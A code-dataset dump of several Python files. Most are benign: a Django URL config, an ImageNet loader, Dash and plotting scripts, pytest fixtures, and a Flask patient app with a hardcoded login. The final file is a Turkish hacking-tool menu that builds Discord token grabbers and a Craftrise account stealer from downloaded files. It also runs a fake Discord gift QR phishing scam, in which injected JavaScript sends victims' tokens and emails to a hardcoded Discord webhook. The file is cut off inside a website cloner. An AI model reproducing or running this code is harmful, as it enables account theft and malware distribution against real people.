max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
tests/testapp/urls.py
|
grofers/django-authlib
| 0
|
12782851
|
from django.conf.urls import include, url
from django.contrib import admin
from django.shortcuts import render
from authlib import views
from authlib.facebook import FacebookOAuth2Client
from authlib.google import GoogleOAuth2Client
from authlib.twitter import TwitterOAuthClient
from testapp.views import custom_verification, custom_verification_code
urlpatterns = [
url(r"", include("authlib.admin_oauth.urls")),
url(r"^admin/", admin.site.urls),
url(r"^404/$", lambda request: render(request, "404.html")),
url(r"^login/$", views.login, name="login"),
url(
r"^oauth/facebook/$",
views.oauth2,
{"client_class": FacebookOAuth2Client},
name="accounts_oauth_facebook",
),
url(
r"^oauth/google/$",
views.oauth2,
{"client_class": GoogleOAuth2Client},
name="accounts_oauth_google",
),
url(
r"^oauth/twitter/$",
views.oauth2,
{"client_class": TwitterOAuthClient},
name="accounts_oauth_twitter",
),
url(r"^email/$", views.email_registration, name="email_registration"),
url(
r"^email/(?P<code>[^/]+)/$",
views.email_registration,
name="email_registration_confirm",
),
url(r"^logout/$", views.logout, name="logout"),
url(r"^custom/$", custom_verification),
url(
r"^custom/(?P<code>[^/]+)/$",
custom_verification_code,
name="custom_verification_code",
),
]
| 1.976563
| 2
|
simsiam_imagenet/imagenet.py
|
Yif-Yang/DSSL
| 8
|
12782852
|
from torchvision.datasets.vision import VisionDataset
import os
import pickle
from torchvision.datasets.folder import default_loader
class Imagenet(VisionDataset):
def __init__(self, root, data_list, train=True, transform=None, target_transform=None, img_dir='all', target_dir='annos'):
super(Imagenet, self).__init__(root, transform=transform,
target_transform=target_transform)
self.data = []
self.targets = []
self.train = train
self.data_list = os.path.join(root, data_list)
self.img_dir_path = os.path.join(root, img_dir)
self.target_dir_path = os.path.join(root, target_dir)
self.transform = transform
self.target_transform = target_transform
if (os.path.isfile(self.data_list)):
with open(self.data_list, 'r') as infile:
for line in infile:
img_name, label = line.strip().split(' ')
self.data.append(os.path.join(self.img_dir_path, img_name))
self.targets.append(int(label) - 1)
else:
print('data list is not file')
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img_path, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = default_loader(img_path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
def extra_repr(self):
return "Split: {}".format("Train" if self.train is True else "Test")
| 2.71875
| 3
|
demo/state_solar_page.py
|
stevej2608/dash-spa
| 27
|
12782853
|
from dash import html, dcc
import dash_bootstrap_components as dbc
import pandas as pd
from .demo import blueprint as spa
global_md = """\
### Global Warming
Global Temperature Time Series. Data are included from the GISS
Surface Temperature (GISTEMP) analysis and the global component
of Climate at a Glance (GCAG). Two datasets are provided:
* Global monthly mean
* Annual mean temperature anomalies in degrees Celsius from 1880 to the present
"""
# Taken from Dash example, see:
# https://dash.plot.ly/datatable
df = pd.read_csv('demo/data/solar.csv')
@spa.route('/solar', title='Solar')
def solar():
return html.Div([
html.Div([
html.Div([], className="col-md-2"),
html.Div([
html.H2('US Solar Capacity'),
html.Br(),
dbc.Table.from_dataframe(df, striped=True, bordered=True, hover=True),
html.Div(id='output')
], className="col-md-8"),
html.Div([], className="col-md-2")
], className='row'),
dbc.Row([
dbc.Col([
dcc.Link("Global Warming", href=spa.url_for('warming'), className="btn btn-primary float-end")
], md=12)
])
], className="container-fluid")
| 3.21875
| 3
|
assets/bifurcation/saddle-node.py
|
dantaylor688/dantaylor688.github.io
| 0
|
12782854
|
from numpy import *
from matplotlib import *
from pylab import *
import matplotlib.lines as mlines
if __name__ == "__main__":
rc('text', usetex=True)
rc('font', family='serif')
fs = 20
### Example 1
x = arange(-5,5,0.1)
# r > 0
fig= figure(1)
ax = fig.add_subplot(311)
frame1 = plt.gca()
hold
r = 5
xdot = r + x**2
ax.plot(x,xdot,'b-')
ylim([min(xdot)-(r+1),max(xdot)])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r > 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# lft = mlines.Line2D.fillStyles
# r = 0
ax = fig.add_subplot(312)
frame1 = plt.gca()
r = 0
xdot = r + x**2
ax.plot(x,xdot,'b-')
ax.plot(0,0,'bo',fillstyle='left',mec='b')
ylim([-1,max(xdot)])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r = 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# r < 0
ax = fig.add_subplot(313)
frame1 = plt.gca()
r = -5
xdot = r + x**2
ax.plot(x,xdot,'b-')
ax.plot(sqrt(-r),0,'bo',mfc='none',mec='b')
ax.plot(-sqrt(-r),0,'bo',fillstyle='full',mec='b')
ylim([min(xdot)-1,max(xdot)])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r < 0$')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-sqrt(-r)-1, 0), xytext=(-sqrt(-r) - 2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(0, 0), xytext=(sqrt(-r)/2., 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(sqrt(-r)+2, 0), xytext=(sqrt(-r) + 1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
### Just axes
# r > 0
fig= figure(500)
ax = fig.add_subplot(311)
frame1 = plt.gca()
hold
r = 5
ylim([-1,1])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r > 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# lft = mlines.Line2D.fillStyles
# r = 0
ax = fig.add_subplot(312)
frame1 = plt.gca()
r = 0
ax.plot(0,0,'ko',fillstyle='left',mec='k')
ylim([-1,1])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r = 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# r < 0
ax = fig.add_subplot(313)
frame1 = plt.gca()
r = -5
ax.plot(sqrt(-r),0,'ko',mfc='none',mec='k')
ax.plot(-sqrt(-r),0,'ko',fillstyle='full',mec='k')
ylim([-1,1])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r < 0$')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-sqrt(-r)-1, 0), xytext=(-sqrt(-r) - 2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(0, 0), xytext=(sqrt(-r)/2., 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(sqrt(-r)+2, 0), xytext=(sqrt(-r) + 1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
### Example 2
#r > 0
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = 1
fig= figure(2)
ax = fig.add_subplot(311)
frame1 = plt.gca()
hold
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
xlim([-2,5])
ylim([-4,5])
title(r'$r > 0$')
ax.annotate('', xy=(-0.5, 0), xytext=(-1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(2.5, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
# r = 0
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = 0
# fig= figure(3)
ax = fig.add_subplot(312)
frame1 = plt.gca()
hold
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(0,0,'ko',fillstyle='left',mec='b')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r = 0$')
ax.annotate('', xy=(-0.5, 0), xytext=(-1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate(r'$r_c$', xy=(0, 0), xytext=(-0.3, 0.3))
ax.annotate('', xy=(2.5, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
# r < 0
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = -1
# fig= figure(4)
ax = fig.add_subplot(313)
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
frame1 = plt.gca()
hold
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(-0.8,0,'ko',fillstyle='full',mec='k')
ax.plot(2.1,0,'ko',mfc='none',mec='k')
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r < 0$')
ax.annotate('', xy=(0.1, 0), xytext=(0.8, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(-1.5, 0), xytext=(-1.9, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2.5, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
# r < 0 again as a separate plot
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = -1
fig= figure(4)
ax = fig.add_subplot(111)
frame1 = plt.gca()
hold
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(-0.8,0,'ko',fillstyle='full',mec='k')
ax.plot(2.1,0,'ko',mfc='none',mec='k')
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r < 0$')
ax.annotate('', xy=(0.1, 0), xytext=(0.8, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(-1.5, 0), xytext=(-1.9, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2.5, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
## Bifurcation diagram example log(1+x)
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = -1
fig= figure(4)
ax = fig.add_subplot(111)
frame1 = plt.gca()
hold
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(-0.8,0,'ko',fillstyle='full',mec='k')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
ax.plot(2.1,0,'ko',mfc='none',mec='k')
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r < 0$')
ax.annotate('', xy=(0.1, 0), xytext=(0.8, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(-1.5, 0), xytext=(-1.9, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2.5, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
### Bifurcation diagram
## r = log(1+x)-x
nx = arange(-0.99,0,0.01)
px = arange(0,5,0.01)
fig= figure(650)
ax = fig.add_subplot(111)
frame1 = plt.gca()
hold
ax.plot(log(1+nx)-nx,nx,'b-')
ax.plot(log(1+px)-px,px,'b--')
ax.plot(arange(-5,6),zeros_like(arange(-5,6)),'k-')
ylabel(r'$x^*$',fontsize=fs)
xlabel(r'$r$',fontsize=fs)
xlim([-5,5])
ax.annotate('Stable', xy=(-4, 16), xytext=(-3,17),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('Unstable', xy=(4, 16), xytext=(2, 17),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(True)
frame1.axes.get_yaxis().set_visible(True)
## x = +-sqrt(-r)
rp = arange(0,5,0.01)
fig= figure(6001)
lx = arange(-5,3,0.01)
ax = fig.add_subplot(111)
frame1 = plt.gca()
hold
ax.plot(-rp,sqrt(rp),'b--')
ax.plot(-rp,-sqrt(rp),'b-')
ax.plot(lx,zeros_like(lx),'k-')
xlabel(r'$r$',fontsize=fs)
ylabel(r'$x^*$',fontsize=fs)
xlim([-5,3])
ax.annotate('Stable', xy=(-4, -2), xytext=(-3,-2.5),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('Unstable', xy=(-4, 2), xytext=(-3, 2.5),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(True)
frame1.axes.get_yaxis().set_visible(True)
show()
| 2.359375
| 2
|
tests/conftest.py
|
Murthy10/pyGeoTile
| 93
|
12782855
|
<gh_stars>10-100
import pytest
'''
Chicago, IL
LatLng: (41.85, -87.64999999999998)
Zoom level: 19
World Coordinate: (65.67111111111113, 95.17492654697409)
Pixel Coordinate: (34430575, 49899071)
Tile Coordinate: (134494, 194918)
'''
@pytest.fixture(scope="session", autouse=True)
def chicago_latitude_longitude():
return 41.85, -87.65
@pytest.fixture(scope="session", autouse=True)
def chicago_zoom():
return 19
@pytest.fixture(scope="session", autouse=True)
def chicago_pixel():
return 34430575, 49899071
@pytest.fixture(scope="session", autouse=True)
def chicago_meters():
return -9757148.442088600, 5138517.444985110
@pytest.fixture(scope="session", autouse=True)
def chicago_pixel_bounds():
return (34430464, 49899264), (34430720, 49899008)
@pytest.fixture(scope="session", autouse=True)
def chicago_meter_bounds():
return (-9757186.660602748, 5138479.226470973), (-9757110.223574463, 5138555.663499258)
@pytest.fixture(scope="session", autouse=True)
def chicago_latitude_longitude_bounds():
return (41.8496161693754, -87.65029907226562), (41.85012764855732, -87.64961242675781)
@pytest.fixture(scope="session", autouse=True)
def chicago_google():
return 134494, 194918
@pytest.fixture(scope="session", autouse=True)
def chicago_tms():
return 134494, 329369
@pytest.fixture(scope="session", autouse=True)
def chicago_quad_tree():
return '0302222310303211330'
| 2.1875
| 2
|
Chapter 04/ch4_3_24.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
| 0
|
12782856
|
<gh_stars>0
x=100
y=100
print(x is y)
#True
| 2.015625
| 2
|
main.py
|
gokudo21/doctor
| 0
|
12782857
|
<reponame>gokudo21/doctor
from flask import Flask, render_template, request
from flask_pymongo import PyMongo
app = Flask(__name__)
#app.config['MONGO_DBNAME'] = 'test'
app.config['MONGO_URI'] = 'mongodb://localhost:27017/test'
#app.config['MONGO_URI'] = 'mongodb://gokudo21:<EMAIL>:18848/patientdb'
mongo = PyMongo(app)
@app.route("/login")
def serve():
return render_template('login.html')
@app.route("/ID")
def ID_view():
return render_template('ID.html')
@app.route("/register")
def register_view():
return render_template('register.html')
@app.route("/room1")
def room1_view():
patients = mongo.db.patients
result = patients.find_one({'room_number': "1"})
return render_template('room1.html', record=result)
@app.route("/room2")
def room2_view():
patients = mongo.db.patients
result = patients.find_one({'room_number': "2"})
return render_template('room2.html', record=result)
@app.route('/pdata',methods = ['POST', 'GET'])
def pdata():
docnamey = request.args.get('docname')
patnamey = request.args.get('patname')
civilnamey = request.args.get('civilname')
agenamey = request.args.get('agename')
Sexnamey = request.args.get('Sexname')
roomnamey = request.args.get('roomname')
Healthnamey = request.args.get('Health')
statusnamey = request.args.get('status')
Medicinesnamey = request.args.get('Medicines')
Elementdnamey = request.args.get('Elementdite')
recommendationnamey = request.args.get('drecommendation')
notenamey = request.args.get('pnote')
patients = mongo.db.patients
patients.insert({'doctor_name' : docnamey, 'patient_name' : patnamey, 'civil_ID' : civilnamey, 'age' : agenamey, 'sex' : Sexnamey, 'room_number' : roomnamey,'health_history' : Healthnamey, 'patient_status' : statusnamey, 'medicines' : Medicinesnamey, 'element_diet' : Elementdnamey, 'doctor_recommendation': recommendationnamey, 'note': notenamey})
return render_template('ID.html')
@app.route('/patient_info',methods = ['POST', 'GET'])
def find():
searchy = request.args.get('search')
patients = mongo.db.patients
result = patients.find_one({'civil_ID' : searchy})
print('result: ')
print(result)
return render_template('patient_info.html', record=result)
@app.route('/login_data',methods = ['POST', 'GET'])
def login_data():
passwordy = request.args.get('psw')
useridy = request.args.get('userid')
if passwordy == "<PASSWORD>" and useridy == "haya" or passwordy == "<PASSWORD>" and useridy == "manal":
return render_template('ID.html')
else :
return render_template('login.html')
@app.route("/test6")
def serve6():
return render_template('test6.html')
@app.route('/edit', methods=['GET'])
def edit():
search2y = request.args.get('search2')
patients = mongo.db.patients
result5 = patients.find_one({'civil_ID': search2y})
print("result 5:")
print(result5)
print("search: ")
print(search2y)
return render_template('edit.html', record=result5)
@app.route('/edit2',methods = ['POST', 'GET'])
def edit2():
docname2y = request.args.get('docname2')
patname2y = request.args.get('patname2')
civilname2y = request.args.get('civilname2')
agename2y = request.args.get('agename2')
Sexname2y = request.args.get('Sexname2')
roomname2y = request.args.get('roomname2')
Healthname2y = request.args.get('Health2')
statusname2y = request.args.get('status2')
Medicinesname2y = request.args.get('Medicines2')
Elementdname2y = request.args.get('Elementdite2')
recommendationname2y = request.args.get('drecommendation2')
notename2y = request.args.get('pnote2')
patients = mongo.db.patients
#1patients.update({'name': 'target'}, {'school': 'new school', 'age': 'new age'})
patients.update({'civil_ID': civilname2y} ,{ 'doctor_name': docname2y, 'patient_name': patname2y, 'civil_ID': civilname2y, 'age': agename2y, 'sex': Sexname2y,'room_number': roomname2y, 'health_history': Healthname2y, 'patient_status': statusname2y,'medicines': Medicinesname2y, 'element_diet': Elementdname2y, 'doctor_recommendation': recommendationname2y,'note': notename2y})
return patname2y + ' updated'
if __name__ == '__main__':
try:
app.run(debug=True, host='0.0.0.0', port=80)
except Exception as e:
print("exception: ")
print(str(e))
app.run(debug=True)
| 2.546875
| 3
|
main.py
|
casmofoundation/Ctool
| 0
|
12782858
|
import os
from licensing.models import *
from licensing.methods import Key, Helpers
from PIL import Image, ImageFont, ImageDraw
import sys
import time
from colorama import Fore, Back, Style, init
import shutil
import sys
import os
import requests
import shutil
from bs4 import BeautifulSoup
from requests import get
init(autoreset=True)
import requests
a = 5
b = 6
if a == b:
print("burası eskiden lisans key sistemi oldugu için kodları bozulmaması için kaldı")
#hehe deneme
else:
ShowText = 'CASPERSS AREA'
API_ENDPOINT = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
APPDATA = os.getenv("APPDATA")
def _get_real_direct_link(sharing_link):
pk_request = requests.get(API_ENDPOINT.format(sharing_link))
# Returns None if the link cannot be "converted"
return pk_request.json().get('href')
def _extract_filename(direct_link):
for chunk in direct_link.strip().split('&'):
if chunk.startswith('filename='):
return chunk.split('=')[1]
return None
def download_yandex_link(sharing_link, filename=None):
direct_link = _get_real_direct_link(sharing_link)
if direct_link:
filename = filename or _extract_filename(direct_link)
download = requests.get(direct_link)
os.chdir(APPDATA)
with open(filename, 'wb') as out_file:
out_file.write(download.content)
print('İndirildi exploit "{}" "{}"')
else:
print('Bağlantını Kontrol et "{}"')
def Spinner():
l = ['|', '/', '-', '\\']
for i in l + l + l:
sys.stdout.write(f"""\r# Yükleniyor... {i}""")
sys.stdout.flush()
time.sleep(0.4)
font = ImageFont.truetype('arialbd.ttf', 15)
size = font.getsize(ShowText)
image = Image.new('1', size, 1)
draw = ImageDraw.Draw(image)
draw.text((0, 0), ShowText, font=font)
for rownum in range(size[1]):
line = []
for colnum in range(size[0]):
if image.getpixel((colnum, rownum)):
line.append(' '),
else:
line.append('#'),
print(Fore.LIGHTGREEN_EX + ''.join(line))
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(
Fore.RED + "https://discord.gg/X8KjZJ3J2U ----- https://github.com/Casper-dev172 ------- doldoldol#3909(CASMO#9663)")
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(Fore.CYAN + "Welcome CASMO AREA")
print(Fore.MAGENTA + "[1] Rat")
print(Fore.MAGENTA + "[2] Discord Token Grabber")
print(Fore.MAGENTA + "[3] Fake QR Scam")
print(Fore.MAGENTA + "[4] Sbo Fucker v2")
print(Fore.MAGENTA + "[5] Craftrise Account Stealer")
print(Fore.MAGENTA + "[6] Fastfingers word hack")
print(Fore.MAGENTA + "[7] İd to token")
print(Fore.MAGENTA + "[8] Website Cloner")
print(Fore.MAGENTA + "[9] DDOS ATTACK!")
print(Fore.MAGENTA + "[10] DİSCORD TOKEN WORLD!")
print(Fore.MAGENTA+"[11] Discord Webhook spammer")
anan = os.getcwd()
x = input()
if x == "1":
Spinner()
print("Bu Geliştirme Sürecindedir yakında gelecektir.")
if x == "2":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/RyoA8MTLfGNlVw")
download_yandex_link("https://disk.yandex.com.tr/d/6lTr5TINtpbD2Q")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("sasa.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup.py build")
time.sleep(15)
os.remove("sasa.py")
os.remove("setup.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "5":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/6pSN66uFNLuIaQ")
download_yandex_link("https://disk.yandex.com.tr/d/4Nw7r50OrLwCzw")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("cr.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup1.py build")
time.sleep(15)
os.remove("cr.py")
os.remove("setup1.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "3":
Spinner()
print(
Fore.BLUE + "[BİLGİ]Bu uygulamada chrome açılacaktır sekmeyi kesinlikle kapatmamalısınız discord_gift.png oluşturulduktan sonra kurbana attıktan sonra kurban okuttuğu zaman o açılan chrome sekmesinde kullanıcının hesabına giriş yapmış olcaksınızdır"
"ve cmd de bir kaç hata belirebilir onlara aldırış etmeyin ve tadını çıkarın ")
time.sleep(5)
from bs4 import BeautifulSoup
from selenium import webdriver
from PIL import Image
import base64
import time
import os
def qr_hazırla():
im1 = Image.open('temp/resim1.png', 'r')
im2 = Image.open('temp/logo.png', 'r')
im2_w, im2_h = im2.size
im1.paste(im2, (60, 55))
im1.save('temp/anan.png', quality=95)
def bindir():
im1 = Image.open('temp/template.png', 'r')
im2 = Image.open('temp/anan.png', 'r')
im1.paste(im2, (120, 409))
im1.save('discord_gift.png', quality=95)
def main():
print('FAKE QR SCAM\n')
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
driver.get('https://discord.com/login')
time.sleep(5)
print('Sayfa Yüklendi')
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qr_code = soup.find('img')['src']
file = os.path.join(os.getcwd(), 'temp/resim1.png')
img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
with open(file, 'wb') as handler:
handler.write(img_data)
discord_login = driver.current_url
qr_hazırla()
bindir()
print('Gift Code Oluşturuldu Klasörü kontrol ediniz.')
print('QR code oluşturuldu kurbanın okutmasını bekleyiniz.')
while True:
time.sleep(6)
if discord_login != driver.current_url:
print('tokenı çekiyooorummm')
driver.execute_script('''
location.reload();
var discordWebhook = "https://discord.com/api/webhooks/939082111149809715/arZ4T9gWDAVVcrifcg_w7eO4nS7pu2NsL8BfqSu-XtjGkuwMBZQ6-oFQFwF5Clt0PxA5";
var i = document.createElement('iframe');
document.body.appendChild(i);
var request = new XMLHttpRequest();
request.open("POST", discordWebhook);
request.setRequestHeader('Content-type', 'application/json');
var params = {
username: "Token Grabber",
avatar_url: "https://malwarefox.com/wp-content/uploads/2017/11/hacker-1.png",
content: '**OMG HEÇKIR APİĞĞĞ!**\n------------------\nToken : ' + i.contentWindow.localStorage.token + '\n------------------\nAdresse email : ' + i.contentWindow.localStorage.email_cache
};
request.send(JSON.stringify(params));
''')
print('---')
print("çekkkkkkkkktimmmmmmmmmm:")
break
print('İş bitti')
if __name__ == '__main__':
main()
if x == "4":
Spinner()
download_yandex_link("https://disk.yandex.com.tr/d/ylx0-4Q93wrnFA")
download_yandex_link("https://disk.yandex.com.tr/d/s_gD3XvCcs6yVg")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
os.system("python setup2.py build")
time.sleep(15)
os.remove("sbo.py")
os.remove("setup2.py")
shutil.move(f"{APPDATA}\\build", anan)
print("İşlem bitti dikkat et kendin açma :)")
if x == "6":
Spinner()
print("Bu chromedriver ürünüdür eğer sürümle alakalı hata alırsanız chromedriverın sitesine gidip kendi chrome sürümünüze uygun chromedriverı yükleyip klasöerlin içine atınız")
print("fastfingers email giriniz")
e = input()
print("fastfingers paralo giriniz")
p = input()
from selenium import webdriver
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
options = webdriver.ChromeOptions()
driver = webdriver.Chrome()
driver.maximize_window();
email = e
password = p
driver.get("https://10fastfingers.com/login");
driver.find_element_by_name("data[User][email]").send_keys(email)
driver.find_element_by_name("data[User][password]").send_keys(password)
driver.find_element_by_id("login-form-submit").click()
time.sleep(1)
driver.get("https://10fastfingers.com/typing-test/turkish");
wait = WebDriverWait(driver, 10)
inputElement = wait.until(EC.presence_of_element_located((By.ID, "inputfield")))
time.sleep(4)
word_list = driver.execute_script("return words")
number = 0;
for word in word_list:
inputElement.send_keys(word + " ")
if x =="7":
Spinner()
print(Fore.RED+"bu sadece tokenın ilk baştaki karakterleri verir 2 faktörlü doğrulamalı hesaplarda kullanılamaz")
import base64
userid = input(Fore.LIGHTYELLOW_EX+" İd gir : ")
encodedBytes = base64.b64encode(userid.encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")
print(Fore.LIGHTYELLOW_EX+f'\n tokenın başı: {encodedStr}')
if x =="8":
Spinner()
print("bazı hatalar olabilir eğer sıkıntı olursa bize ulaşınız")
print("site giriniz https://casperss.cf şeklinde")
x = input()
print("hangi klasör e kaydetmek istiyorsunuz")
y = input()
base_dir = os.getcwd()
site_name = x
project_name = y
project_path = "../" + project_name
os.makedirs(project_path, exist_ok=True)
visited_links = []
error_links = []
def save(bs, element, check):
links = bs.find_all(element)
for l in links:
href = l.get("href")
if href is not None and href not in visited_links:
if check in href:
href = l.get("href")
print("indiriliyor: {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
